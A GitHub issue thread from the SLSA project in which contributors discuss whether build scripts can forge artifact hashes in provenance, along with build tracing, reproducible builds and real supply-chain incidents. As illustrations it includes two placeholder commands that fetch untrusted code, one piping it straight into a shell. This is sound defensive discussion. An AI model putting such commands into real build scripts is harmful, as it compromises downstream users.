slsa-framework / slsa

Supply-chain Levels for Software Artifacts
https://slsa.dev
Other
1.51k stars 218 forks source link

Question on blob post about "Service Generated" #362

Open laurentsimon opened 2 years ago

laurentsimon commented 2 years ago

In the blog post https://slsa.dev/blog/2022/04/slsa-is-no-free-lunch, we say:

Service Generated essentially means that the data in the provenance should be generated by the build service itself as 
opposed to output by what is running inside the user defined build step. This is important because a build is potentially 
running arbitrary code and has an unbounded state space. The build service which is orchestrating the build is quite 
limited in scope and not running unbounded user defined builds. Most build systems today require some modification and 
custom configuration to support this requirement.

I think there's a caveat to that: the artifact's hash. The hash needs to be taken from the "user defined build step" (it's computed by the build service from the binary generated by "user defined steps").

However, even at SLSA level 3, there is nothing stopping a user from doing something to the effect of:

curl some-malicious-binary > output-binary

So the hash is forgeable at SLSA3, and a user can trick a trusted service to attesting to arbitrary artifacts, unless we bound the state of the "steps".

Do I understand this correctly?

mlieberman85 commented 2 years ago

Short answer I think is "yes" absolutely. Longer answer is I think there are ways to mitigate that sort of attack.

Reading through the SLSA wording:

The output artifact hash from [Identifies Artifact (https://slsa.dev/spec/v0.1/requirements#identifies-artifact). Reasoning: This only allows a “bad” build to falsely claim that it produced a “good” artifact. This is not a security problem because the consumer MUST accept only “good” builds and reject “bad” builds.

I believe the way you would then mitigate the attack is by essentially approving only good builders. So if during certification of a builder it is performing bad operations you wouldn't certify it.

This doesn't mitigate more sophisticated attacks though where it only does the bad thing in certain situations or after a certain time.

The way I've been POCing an acual implemenation of it is by using eBPF and similar tracing tools during certification of a builder/build step to ensure it's only doing what I expect it to do. I also do the same thing for certain critical builds. I will admit this doesn't scale if you have complicated massive builds.

laurentsimon commented 2 years ago

I understand the mitigation ideas, but it's not clear what a "good build" is and how to validate this given that the space of inputs is "unbounded".

re: tracing tools during certification of a builder/build step to ensure it's only doing what I expect it to do. That only really works if you know what goes into the build yourself (if you're part of the team who publishes the artifact). Realistically it's pretty hard to decide if something is bad or good if it comes from a remote team, unless we agree on a set of "good build practices".. to bound the scope of the input.

cc @varunsh-coder who has a GitHub action doing that via syscall introspection

laurentsimon commented 2 years ago

cc @enck interesting research problem

mlieberman85 commented 2 years ago

I guess it depends on who and what you trust. It might be a bit easier for a company to do by providing policies and best practices around the build space.

It might be harder around some open source projects if they don't have the right governance and/or the right funding to support some of these things.

laurentsimon commented 2 years ago

I guess it depends on who and what you trust. It might be a bit easier for a company to do by providing policies and best practices around the build space.

It might be harder around some open source projects if they don't have the right governance and/or the right funding to support some of these things.

+1 that makes sense.

mlieberman85 commented 2 years ago

This is actually a project we're looking at in the CNCF Security TAG: https://github.com/cncf/tag-security/issues/890 -- to take a CNCF project and try to enforce all the right build practices we can, find where there might be gaps in the tooling space and maybe work with projects like Alpha/Omega to see if there are ways we can fund additional effort.

varunsh-coder commented 2 years ago

Thanks for tagging me @laurentsimon.

https://github.com/step-security/harden-runner monitors for file overwrite of source code during build. It also monitors outbound connections and one can limit outbound traffic at both DNS and TCP layers. @mlieberman85 I am curious what checks have you implemented in your POCs with eBPF...

w.r.t real incidents, the SolarWinds breach is a great example to learn from. I think even if one had generated SLSA level 3/4 provenance on that build server, one would not be able to detect that a source file was modified. Please correct me if you think differently. Source code was changed just before build and reverted to original after build completed.

There was another attack - event-stream incident, where a dependency modified the build artifacts for a specific project (Copay) only.

I am not sure if detecting such attacks is part of the SLSA goals or not. I think it should be and there should be basic monitoring of the build server at file, network, and process level. e.g. was source code/ artifact/ dependency overwritten during release build.

TomHennen commented 2 years ago

SLSA does offer some protection against attacks like SolarWinds (see the threats pages, row D). It does this by placing higher security requirements on the build system itself. Of course if an attacker is able to circumvent the security controls then yes, the attack would still go undetected. This is where reproducible builds (just recommended at SLSA L4) probably could detect this type of attack.

mlieberman85 commented 2 years ago

@varunsh-coder I will try and find some of the demos I had given at some public working group meetings. I mostly used Aqua security Tracee to track what a build was doing and highlight when the build seemed to be writing stuff directly into memory and then execing what it straight from memory.

@TomHennen I do like that point. SLSA puts a higher burden on the build system itself which means you know where to focus your efforts. I wonder if we can integrate or at least cite some of the best practices as defined in: https://github.com/cncf/tag-security/blob/main/supply-chain-security/supply-chain-security-paper/CNCF_SSCP_v1.pdf -- around page 20.

I think SLSA helps with reducing attack surface and limiting blast radius in this context. If you are doing the right things, the most likely attack vector becomes the build itself and you can focus on securing the areas that are harder to reason about, e.g. compilation.

laurentsimon commented 2 years ago

re: build tracing. One could also perform the tracing post-build (say, at ingestion time on the consumer side) by replaying the build command reported in the SLSA provenance. This may be viable in certain scenarios, and would not require the original builders do that for us.

re: reproducible builds. I've heard different things around reproducibility:

  1. Some folks say that a build is reproducible if running the build multiple times on the same system give the same binary; and we can indicate this in the SLSA provenance. In the context of SLSA provenance generation on GitHub, for example, we've been suggested to run the build step multiple times and compare the output. I think this is the definition on the SLSA website https://slsa.dev/spec/v0.1/requirements#reproducible
  2. Reproducible builds on a variety of systems with high diversity (Windows, etc) and compare the output

To me reproducible builds is (2), but it seems like the SLSA definition is (1). I wonder if this may become a source of confusion.

Another random note: Like the artifact hash, any other artifacts generated by the untrusted build steps needs additional work consumer side to validate. SBOMs, if generated by the compiler, are a good example of this. Is there a way for SLSA provenance to indicate whether the predicate was generated post-build? Or will we use the build service's name as a proxy to infer that? I think what I'm getting at is the need to indicate "where the provenance information came from" (untrusted build step or not)

TomHennen commented 2 years ago

What do you mean by "the same system". Do you mean the same actual machine/service or do you mean "org 1 built this on their own Debian 11 machine and got hash 123, and then org 2 built this on their own Debian 11 machine and got hash 123 so it's all good"?

Is there a way for SLSA provenance to indicate whether the predicate was generated post-build

Yes, I think the builder.id is how that will be indicated (in a round-about way). Builders that just infer information of take it from the build step should qualify only for lower SLSA levels and that lower level should be associated with their builder.id. Ideally it would even be nice if the security assessment for each builder were available somewhere...

laurentsimon commented 2 years ago

What do you mean by "the same system". Do you mean the same actual machine/service or do you mean "org 1 built this on their own Debian 11 machine and got hash 123, and then org 2 built this on their own Debian 11 machine and got hash 123 so it's all good"?

in the context of reusable workflow, by "same" I meant "on a GitHub runner using ubuntu-latest".

varunsh-coder commented 2 years ago

SLSA does offer some protection against attacks like SolarWinds (see the threats pages, row D). It does this by placing higher security requirements on the build system itself. Of course if an attacker is able to circumvent the security controls then yes, the attack would still go undetected. This is where reproducible builds (just recommended at SLSA L4) probably could detect this type of attack.

Thanks for sharing @TomHennen. I am still ramping up on the SLSA requirements. I do have some observations w.r.t these controls. W.r.t SolarWinds attack, this is my assessment of what would and what would not have helped. Please do correct me so I can better understand this.

Control SolarWinds scenario
Scripted build Yes (TeamCity)
Build service Yes (TeamCity + self hosted build server)
Build as code Yes (TeamCity)
Ephemeral No
Isolated Probably not
Parameterless Not sure
Hermetic Unlikely
Reproducible Unlikely

As per this, I think having an ephemeral and isolated build system would have helped, as the attacker would need to regain control for each build vs persisting access. w.r.t reproducible, the build could have been reproducible (if the right flags were set). But SLSA does not need one to independently verify the build, only that it is reproducible (similar to what @laurentsimon mentioned - being reproducible in itself does not prevent detection of such an attack).

Moving to ephemeral and isolated only leads to change in attack tactics though. e.g. the goal becomes to compromise a build tool/ dependency downloaded as part of the build. e.g. in the codecov breach, the downloaded bash script was malicious. Or the other event-stream incident, where a dependency was malicious and it modified artifacts.

Just listing my thoughts to gain a better understanding of the controls.

TomHennen commented 2 years ago

Moving to ephemeral and isolated only leads to change in attack tactics though.

I think what's important is that it should also increase the cost to the attacker. Yes it's still possible that they could subvert some of these controls, but they'd have to spend more of their budget to do so, and have a higher risk of detection.

varunsh-coder commented 2 years ago

Moving to ephemeral and isolated only leads to change in attack tactics though.

I think what's important is that it should also increase the cost to the attacker. Yes it's still possible that they could subvert some of these controls, but they'd have to spend more of their budget to do so, and have a higher risk of detection.

I think ephemeral and isolated are good controls. In addition, I do think having basic DNS, network, and file monitoring is also needed for build servers. There is clear evidence that malicious build tools/ dependencies are being distributed and get downloaded onto the build servers.

In terms of cost - some basic attack methods like dependency confusion, it is in some cases easier to do that (just publish a package with same name and higher version) than to compromise the build server. So you could have a scenario where there is a SLSA Level 4 build (because all controls are met) that downloads a compromised build tool/ dependency that either exfiltrates credentials (signing keys for example - like in case of Codecov/ HashiCorp or modifies source code/ artifacts), that goes completely undetected.

laurentsimon commented 2 years ago

The dependencies of the builder itself are reported in the material section of the SLSA provenance. So although it may not prevent the attack, it should be retroactively detectable once the attack is discovered. Unless the dependency is also used by the provenance generation code or is part of the OS :/ ... Actually it's an interesting question as to what the minimum. We could have very small custom builders tuned to a very special build pipeline

In general, you're right that we need to limit to a minimum the dependencies of the builder itself

TomHennen commented 2 years ago

I think some aspects of dependency confusion can be resolved by verifying dependencies during the build process against some policy (either full or delegated as discussed in this blog post series).

varunsh-coder commented 2 years ago

I think some aspects of dependency confusion can be resolved by verifying dependencies during the build process against some policy (either full or delegated as discussed in this blog post series).

Interesting. what sort of policy would this be, in the sense what attribute/ metadata of the dependency would it verify to look for dependency confusion?

dn-scribe commented 2 years ago

Hi, I'm not sure this is the right place, but I'll give it a shot; Above @mlieberman85 qouted the following from the standard:

The output artifact hash from [Identifies Artifact] (https://slsa.dev/spec/v0.1/requirements#identifies-artifact). Reasoning: This only allows a “bad” build to falsely claim that it produced a “good” artifact. This is not a security problem because the consumer MUST accept only “good” builds and reject “bad” builds.

I did not understand this statement; Why, can't a bad build (a malicious-user-controlled build script, or a vulnerable build tool), both modify an artifact and supply it's hash as the artifact hash?

Is it due to the SLSA assumption that the build machine/process is trusted to generate trustworthy provenance?

As I understand there may be no real or worthy options to creating the artifact identity, but I did not get why a bad build could only give a hash of a good artifact.

Could somewone please clarify?

mlieberman85 commented 2 years ago

It should be clarified a bit, but the idea is that only a good build would never falsely claim to generate a bad artifact. In addition, since only the artifact hash is allowed to be determined by the build script the other things you mentioned: malicious build script, or vulnerable tool would be included in the provenance and should be caught.

MarkLodato commented 2 years ago

I agree that the docs need significant improvement here. Let met take a shot at explaining by way of example, which we can then move into the official docs if it reads well. Also some of this can be found within https://slsa.dev/threats.

Example: The Python package PyYAML is supposed to be built from https://github.com/yaml/pyyaml using (let's pretend) GitHub Actions workflow ci.yaml.

To build v6.0, the official workflow (i.e. "good" build) really did produce a file with sha256 hash f84f…90b5. This was by definition correct because it was the official process from the official source code. The requirement in question says that the builder must certify that all the other fields within the provenance are correct. For example:

Does that help?

dn-scribe commented 2 years ago

Thanks for the prompt responses.

Sorry, but I'm not convinced;

The assumption behind "service generated provenance" is that user-script generated provenance is not trustworthy enough.

An attacker that can determine the artifact identity will find something evil to do with this capability.

Examples:

To make things clear, I think that requiring the build service to fill in the artifact hash is a tough requirement, hardly applicable. Usually the build systems, which are generic, do not know what the artifact is. It could be some string hiding in a makefile, or generated on the fly using environment variables, time and other parameters unkown to the build service.

The reason to allow the user script to determine the artifact hash should be a practical necessity and not because there is no risk.

What do you think?

MarkLodato commented 2 years ago

@dn-scribe, sorry, no, I disagree. Those examples are all things where the consumer does the wrong, insecure thing. They should only accept things by verifying against some policy. I think this will all become more clear once we have concrete prototype implementations.

MarkLodato commented 1 year ago

Could someone describe the specific issue that we want to address in the specification? I read through this entire thread but was unable to turn that into something actionable.

dn-scribe commented 1 year ago

As I see it there are two issues that got mixed up here:

  1. Who should attest to the built artifact hash. The current definition here is that that build script can, though not totaly trusted. The discussion was mainly answering why - Is it a practical necessity or is it secure enough. My take is that it is a necessity, but the standard should explain why, what the risks are, and what is expected from the implementor to do.
  2. What saves us from the "curl evil-malware | sh" in a build script - the answer as I understand it is - the SLSA L4 reviewers requirement.
MarkLodato commented 1 year ago

Thank you for the summary, @dn-scribe! That is extremely helpful. We'll try to work this into the spec.